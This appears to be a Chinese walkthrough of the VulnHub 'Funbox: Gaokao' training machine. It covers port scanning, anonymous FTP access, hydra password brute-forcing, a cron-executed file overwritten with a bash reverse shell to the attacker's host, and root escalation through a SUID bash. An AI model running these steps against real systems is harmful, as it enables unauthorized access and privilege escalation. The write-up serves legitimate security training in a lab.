靶机描述
靶机地址:https://www.vulnhub.com/entry/funbox-gaokao,707/
一、搭建靶机环境
攻击机Kali:
靶机:
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
☁ kali arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 08:00:27:ce:b3:82 PCS Systemtechnik GmbH
192.168.9.48 08:00:27:84:5a:6f PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 2 responded
☁ kali
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
☁ kali nmap -A -sV -T4 -p- 192.168.9.48
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 14:56 CST
Nmap scan report for 192.168.9.48
Host is up (0.00038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 169 Jun 5 2021 welcome.msg
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
| 256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_ 256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Wellcome to Funbox: Gaokao !
|_http-server-header: Apache/2.4.29 (Ubuntu)
3306/tcp open mysql MySQL 5.7.34-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.34-0ubuntu0.18.04.1
| Thread ID: 4
| Capabilities flags: 65535
| Some Capabilities: IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, ConnectWithDatabase, LongPassword, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, Support41Auth, LongColumnFlag, IgnoreSigpipes, FoundRows, InteractiveClient, SupportsTransactions, SupportsLoadDataLocal, SupportsCompression, ODBCClient, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: HPU~~D\x17\x01a&,\x15;\x18\x17\x0Ef\x7F'|
|_ Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.34_Auto_Generated_Server_Certificate
| Not valid before: 2021-06-05T15:15:30
|_Not valid after: 2031-06-03T15:15:30
MAC Address: 08:00:27:84:5A:6F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.9.48
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.30 seconds
21—ftp—ProFTPD 1.3.5e—Anonymous FTP login allowed (FTP code 230)
22—ssh—OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80—http—Apache httpd 2.4.29 ((Ubuntu))
3306—mysql—MySQL 5.7.34-0ubuntu0.18.04.1
2.2枚举漏洞
2.2.1 21端口分析
由于我们可以匿名访问 FTP 服务器
☁ FunBox9 ftp 192.168.9.48
Connected to 192.168.9.48.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.9.48]
Name (192.168.9.48:hirak0): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.9.7 !
230-
230-The local time is: Thu Mar 17 07:24:26 2022
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
发现sky@funbox9
2.2.2 22 端口分析
一般只能暴力破解,暂时没有合适的字典
2.2.3 80 端口分析
2.3漏洞利用
2.3.1 修改定时任务文件getshell
使用hydra爆破一下sky密码
hydra -l sky -P /usr/share/wordlists/rockyou.txt 192.168.9.48 ftp
☁ FunBox9 hydra -l sky -P /usr/share/wordlists/rockyou.txt 192.168.9.48 ftp
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-17 15:26:17
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.9.48:21/
[STATUS] 373.00 tries/min, 373 tries in 00:01h, 14344026 to do in 640:56h, 16 active
[21][ftp] host: 192.168.9.48 login: sky password: thebest
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-17 15:28:39
成功拿到账户密码sky:thebest
由于kali默认的 ftp 客户端不是友好,这里使用 lftp
☁ FunBox9 lftp -u sky,thebest 192.168.9.48
lftp sky@192.168.9.48:~> ls
-rwxr-x--- 1 sky sarah 66 Jun 6 2021 user.flag
lftp sky@192.168.9.48:~> ls -al
drwxr-xr-x 3 sky sky 4096 Jun 6 2021 .
drwxr-xr-x 5 root root 4096 Jun 5 2021 ..
-rw------- 1 sky sky 56 Jun 5 2021 .bash_history
-r--r--r-- 1 sky sky 220 Jun 5 2021 .bash_logout
-r--r--r-- 1 sky sky 3771 Jun 5 2021 .bashrc
-r--r--r-- 1 sky sky 807 Jun 5 2021 .profile
drwxr----- 2 root root 4096 Jun 5 2021 .ssh
-rwxr-x--- 1 sky sarah 66 Jun 6 2021 user.flag
-rw------- 1 sky sky 1489 Jun 5 2021 .viminfo
lftp sky@192.168.9.48:~> cat user.flag
#!/bin/sh
echo "Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd"
68 bytes transferred
lftp sky@192.168.9.48:~>
我们可以看到该flag具有一个 shell 脚本,并且该文件具有用户 sarah 的可执行评估。因此,我们可能会猜测有一个由 sarah 运行的 cron 作业。因此,我将文件下载到本地计算机,更新脚本并将其上传到 ftp 服务器。
lftp sky@192.168.9.48:~> put user.flag
52 bytes transferred
lftp sky@192.168.9.48:~> ls -al
drwxr-xr-x 3 sky sky 4096 Jun 6 2021 .
drwxr-xr-x 5 root root 4096 Jun 5 2021 ..
-rw------- 1 sky sky 56 Jun 5 2021 .bash_history
-r--r--r-- 1 sky sky 220 Jun 5 2021 .bash_logout
-r--r--r-- 1 sky sky 3771 Jun 5 2021 .bashrc
-r--r--r-- 1 sky sky 807 Jun 5 2021 .profile
drwxr----- 2 root root 4096 Jun 5 2021 .ssh
-rwxr-x--- 1 sky sarah 52 Mar 17 07:41 user.flag
-rw------- 1 sky sky 1489 Jun 5 2021 .viminfo
lftp sky@192.168.9.48:~> cat user.flag
#!/bin/sh
bash -i >& /dev/tcp/192.168.9.7/6666 0>&1
54 bytes transferred
lftp sky@192.168.9.48:~>
kali本地监听:nc -lvp 6666,成功拿到shell
☁ FunBox9 nc -lvp 6666
listening on [any] 6666 ...
192.168.9.48: inverse host lookup failed: Host name lookup failure
connect to [192.168.9.7] from (UNKNOWN) [192.168.9.48] 53418
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ id
id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$
使用Python切换一下shell:python -c 'import pty;pty.spawn("/bin/bash")'
但是,由于 python 的方式无法让我获得 PTY shell,所以我找到了以下方法。
SHELL=/bin/bash script -q /dev/null
2.4权限提升
2.4.1 信息收集
接下来,当我搜索 suid 二进制文件时,我发现 bash 已启用 setuid
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
bash-4.4$ find / -perm -4000 -exec ls -al {} \; 2>/dev/null
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
-rwsr-sr-x 1 root root 1113504 Jun 6 2019 /bin/bash
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
-rwsr-sr-x 1 root mail 96648 Nov 16 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 113528 Feb 2 2021 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
bash-4.4$
在https://gtfobins.github.io查找到/bin/bash
我们使用suid提权
运行bash -p命令,进入root目录到查找到root.flag
bash-4.4$ bash -p
bash -p
bash-4.4# id
id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)
bash-4.4# cd /root
cd /root
bash-4.4# ls -al
ls -al
total 28
drwx------ 4 root root 4096 Jun 6 2021 .
drwxr-xr-x 24 root root 4096 Jun 5 2021 ..
-rw------- 1 root root 0 Jun 6 2021 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 2289 Jun 5 2021 root.flag
drwx------ 2 root root 4096 Jun 5 2021 .ssh
drwxr-xr-x 2 root root 4096 Jun 5 2021 .vim
-rw------- 1 root root 0 Jun 6 2021 .viminfo
bash-4.4# cat root.flag
cat root.flag
█████▒█ ██ ███▄ █ ▄▄▄▄ ▒█████ ▒██ ██▒ ▄████ ▄▄▄ ▒█████ ██ ▄█▀▄▄▄ ▒█████
▓██ ▒ ██ ▓██▒ ██ ▀█ █ ▓█████▄ ▒██▒ ██▒▒▒ █ █ ▒░ ██▒ ▀█▒▒████▄ ▒██▒ ██▒ ██▄█▒▒████▄ ▒██▒ ██▒
▒████ ░▓██ ▒██░▓██ ▀█ ██▒▒██▒ ▄██▒██░ ██▒░░ █ ░ ▒██░▄▄▄░▒██ ▀█▄ ▒██░ ██▒▓███▄░▒██ ▀█▄ ▒██░ ██▒
░▓█▒ ░▓▓█ ░██░▓██▒ ▐▌██▒▒██░█▀ ▒██ ██░ ░ █ █ ▒ ░▓█ ██▓░██▄▄▄▄██ ▒██ ██░▓██ █▄░██▄▄▄▄██ ▒██ ██░
░▒█░ ▒▒█████▓ ▒██░ ▓██░░▓█ ▀█▓░ ████▓▒░▒██▒ ▒██▒ ░▒▓███▀▒ ▓█ ▓██▒░ ████▓▒░▒██▒ █▄▓█ ▓██▒░ ████▓▒░
▒ ░ ░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░ ░▒ ▒ ▒▒ ▓▒█░░ ▒░▒░▒░ ▒ ▒▒ ▓▒▒▒ ▓▒█░░ ▒░▒░▒░
░ ░░▒░ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░ ▒ ▒░ ░░ ░▒ ░ ░ ░ ▒ ▒▒ ░ ░ ▒ ▒░ ░ ░▒ ▒░ ▒ ▒▒ ░ ░ ▒ ▒░
░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░░ ░ ░ ▒ ░ ░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
You did it !
THX for playing Funbox: GAOKAO !
I look forward to see this screenshot on twitter: @0815R2d2
bash-4.4#
总结
本靶机依旧是通过ftp进行信息收集,然后修改定时任务文件getshell,最后通过suid提权拿到flag
- hydra爆破ftp
- 信息收集
- suid提权
